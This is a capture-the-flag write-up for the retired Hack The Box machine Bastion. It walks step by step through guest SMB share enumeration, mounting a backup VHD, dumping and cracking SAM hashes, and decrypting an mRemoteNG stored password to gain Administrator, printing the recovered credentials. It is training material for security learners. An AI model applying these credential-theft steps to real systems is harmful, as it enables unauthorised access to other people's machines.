Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Machine Info

Bastion by L4mpje
OS: linux



As usual, we kick off with a Nmap scan.

$ nmap -v -p- -T3 -oN nmap-tcp-allports
 Nmap scan report for
 Host is up (0.028s latency).
 Not shown: 65522 closed ports
 22/tcp    open  ssh
 135/tcp   open  msrpc
 139/tcp   open  netbios-ssn
 445/tcp   open  microsoft-ds
 5985/tcp  open  wsman
 47001/tcp open  winrm
 49664/tcp open  unknown
 49665/tcp open  unknown
 49666/tcp open  unknown
 49667/tcp open  unknown
 49668/tcp open  unknown
 49669/tcp open  unknown
 49670/tcp open  unknown

I run Nmap with the following parameters:

  • -v: run verbose (show more output)
  • -p-: scan all ports, equals 1-65535
  • -T3: run on normal speed (can be omitted, since this is the default speed)
  • -oN nmap-tcp-allports: save output in normal format with said filename
  • host to scan

Note that SSH and SMB are exposed, as well as some other irrelevant services.


Let’s check out if we can find some open shares.

$ nmap --script smb-enum-shares -p 139,445
 Nmap scan report for
 Host is up (0.026s latency).
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 Host script results:
 | smb-enum-shares: 
 |  account_used: guest
 |  \\ADMIN$: 
 |   Comment: Remote Admin
 |   Anonymous access: 
 |   Current user access: 
 |  \\Backups: 
 |   Comment: 
 |   Anonymous access: 
 |   Current user access: READ
 |  \\C$: 
 |   Comment: Default share
 |   Anonymous access: 
 |   Current user access: 
 |  \\IPC$: 
 |   Comment: Remote IPC
 |   Anonymous access: 
 |_  Current user access: READ/WRITE

As you can see, the guest account has read access on the Backups share. This sounds like something worth investigating further.

$ sudo smbmap -s Backups -R -H -u guest | tee -a smbmap
 [+] Finding open SMB ports….
 [+] User SMB session establishd on…
 [+] IP:    Name:                    
 Disk                         Permissions
 ----                         -----------
 Backups                      READ, WRITE
 [!] Unable to remove test directory at \\Backups\tzRrGnGVfe, plreae remove manually
 dr--r--r--        0 Fri Aug 2 11:09:06 2019    .
 dr--r--r--        0 Fri Aug 2 11:09:06 2019    ..
 -r--r--r--       260 Fri Aug 2 11:00:50 2019    nmap-test-file
 -w--w--w--       116 Tue Apr 16 13:43:19 2019    note.txt
 -r--r--r--        0 Fri Feb 22 13:43:28 2019    SDT65CB.tmp
 dr--r--r--        0 Fri Aug 2 11:09:06 2019    tzRrGnGVfe
 dr--r--r--        0 Fri Feb 22 13:44:02 2019    WindowsImageBackup
 [ ... ]
 .\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\
 dr--r--r--        0 Fri Feb 22 13:45:32 2019    .
 dr--r--r--        0 Fri Feb 22 13:45:32 2019    ..
 -r--r--r--        37761024 Fri Feb 22 13:44:03 2019    9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
 -r--r--r--        5418299392 Fri Feb 22 13:45:32 2019    9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
 -r--r--r--       1186 Fri Feb 22 13:45:32 2019    BackupSpecs.xml
 [ ... ]

Opening note.txt, you’ll find another clue on how you may want to continue.

$ smbclient // -U guest
smb: > dir
smb: > get note.txt
smb: > exit

$ cat note.txt
 Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

So we want to have a look at the back-ups.

Analysing the back-ups

The small back-up file ‘9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd’ is a recovery image, which Windows usually creates when you create a back-up image.

The interesting image however is ‘9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd’. As the note said, downloading this file might fail. In my case I was never able to download more than 75% of the vhd using the get command in smbclient.

What worked for me is adding the share as a remote disk and using rsync to copy the image to my system (as rsync allows you to continue failed downloads) for analysis.
However, there are tools available which’ll allow you to browse through an image without having to download the whole image to your disk.

$ sudo mkdir /mnt/vhd
$ sudo mount -t cifs -o user=guest // /mnt/vhd/
$ cd /mnt/vhd/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/
$ rsync --append 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo umount /mnt/vhd
$ cd  ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo vhdimount 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd /mnt/vhd/
$ cd /mnt/vhd/
$ ls
$ mmls -aB vhdi1
 DOS Partition Table
 Offset Sector: 0
 Units are in 512-byte sectors
 Slot   Start    End     Length    Size  Description
 002: 000:000  0000000128  0031248511  0031248384  0014G  NTFS / exFAT (0x07)
$ echo 128*512 | bc
$ sudo mkdir /mnt/dd
$ sudo mount -o ro,noload,offset=65536 -t nfts vhdi1 /mnt/dd

We can now browse through the contents of the image.

Cracking hashes

I start of by looking for password hashes.
These can be retrieved by cracking the SAM (Security Account Manager) file, which is located at C:\Windows\System32\config.

$ cd /mnt/dd/Windows/System32/config/
$ samdump2 SYSTEM SAM > ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
$ cat ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
 *disabled * Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

$ hashcat -m 1000 -a 0 SAM-hashes.txt
$ cat ~/.hashcat/hashcat.potfile

We now have the password of the user L4mpje (“lampje” = “small lightbulb” in Dutch), which is bureaulampje (“small desk lamp” in Dutch).

$ Got the user flag

I use this password to SSH onto the box and find the users.txt file containing the flag on the user’s desktop.

$ ssh L4mpje@ # enter password bureaulampje
L4mpje@BASTION C:\Users\L4mpje> type C:\Users\L4mpje\Desktop\users.txt

# Going for the root flag

While browsing through the filesystem, I noticed mRemoteNG was installed.
This is also confirmed by running this small line of PowerShell:

L4mpje@BASTION C:\Users\L4mpje\Downloads> powershell
PS C:\Users\L4mpje\Downloads> Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize

DisplayName                                                    DisplayVersion Publisher                InstallDate              
-----------                                                    -------------- ---------                -----------              
mRemoteNG                                              Next Generation Software 20190222                 
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161 Microsoft Corporation    20190416

Searching for vulnerabilities on exploit-db didn’t reveal anything, but a quick Google search did bring me to an interesting Reddit post.
The Ruby script in the post didn’t seem to work for me, but I finally found a Python script on GitHub which did.

I downloaded confCons.xml from the host and ran the script to find the password for the Administrator account. I then logged in onto the hosting using the Administrator password to retrieve the flag from the Administrator’s desktop.

$ scp -T L4mpje@"C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml" ./
$ cat confCons.xml
$ python3 -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
 Password: thXLHM96BeKL0ER2

$ ssh Administrator@
administrator@BASTION C:\Users\Administrator> type Desktop\root.txt

Whatever you are, be a good one.
~ Abraham Lincoln